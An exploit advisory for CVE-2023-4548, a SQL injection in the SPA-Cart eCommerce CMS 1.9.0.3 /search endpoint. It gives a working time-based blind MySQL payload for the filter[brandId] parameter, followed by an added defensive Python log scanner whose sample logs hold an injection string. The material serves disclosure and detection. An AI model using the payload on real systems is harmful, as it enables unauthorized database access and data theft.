# Exploit Title: SPA-Cart eCommerce CMS 1.9.0.3 - SQL Injection
# Exploit Author: Cracker
# Date: 20/08/2023
# Vendor: spa-cart
# Vendor Homepage: https://spa-cart.com/
# Software Link: https://demo.spa-cart.com/
# Version: 1.9.0.3
# Tested on: Windows 10 Pro
# Impact: Database Access
# CVE: CVE-2023-4548
# CWE: CWE-89 / CWE-74 / CWE-707
## Greetings
the_pitbull, raz0r, ins, sadsoul, his0k4, hussin x, Mr. SQL, moizsid09, indoushka
cryptojob (Twitter) twitter.com/0x0cryptojob
## Description
SQL injection attacks can allow unauthorized access to sensitive data, modification of
data, and crashing the application or making it unavailable, leading to lost revenue and
damage to a company's reputation.
Path: /search
The GET parameter 'filter[brandId]' is vulnerable to SQL injection.
https://website/search?filtered=1&q=11&load_filter=1&filter[brandId]=[sqli]&filter[price]=100-500&filter[attr][memory][]=500%20GB&filter[attr][color][]=Black
---
Parameter: filter[brandId] (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
Payload: filtered=1&q=11&load_filter=1&filter[brandId]=4'xor(select(0)from(select(select(sleep(7)))))xor'z&filter[price]=100-500&filter[attr][memory][]=500 GB
---
[-] Done
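
A defender-side check for the parameter described above, as an added example (not part of the original advisory or SPA-Cart's own code): it scans access-log lines for /search requests whose filter[brandid] or filter[price] value does not match an expected format. The expected formats, the log layout and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Allowlist patterns for the /search filter parameters named in the advisory.
# The expected formats (numeric brand id, "min-max" price) are assumptions.
EXPECTED = {
    "filter[brandid]": re.compile(r"\d{1,10}"),
    "filter[price]": re.compile(r"\d{1,9}-\d{1,9}"),
}

# Request field of a combined-format access log: "GET /path?query HTTP/1.1"
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')


def check_request(target):
    """Return the (param, value) pairs on /search that violate the allowlist."""
    parts = urlsplit(target)
    if parts.path.rstrip("/") != "/search":
        return []
    bad = []
    # parse_qsl percent-decodes names and values, so %27 is seen as a quote.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        pattern = EXPECTED.get(name.lower())
        if pattern is not None and not pattern.fullmatch(value):
            bad.append((name, value))
    return bad


def scan_log(lines):
    """Yield (line_number, violations) for each suspicious access-log line."""
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if match:
            violations = check_request(match.group(1))
            if violations:
                yield number, violations


# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [20/Aug/2023:10:00:01 +0000] "GET /search?filtered=1&q=11&load_filter=1&filter[brandid]=4&filter[price]=100-500 HTTP/1.1" 200 5120',
    '192.0.2.77 - - [20/Aug/2023:10:00:09 +0000] "GET /search?filtered=1&q=11&filter[brandid]=4%27xor(1)xor%27z&filter[price]=100-500 HTTP/1.1" 200 5120',
    '192.0.2.10 - - [20/Aug/2023:10:00:12 +0000] "GET /product/17 HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for number, violations in scan_log(SAMPLE_LOG):
        print(number, violations)
```

The same allowlist can be enforced server-side before the value reaches the query, alongside parameterized statements.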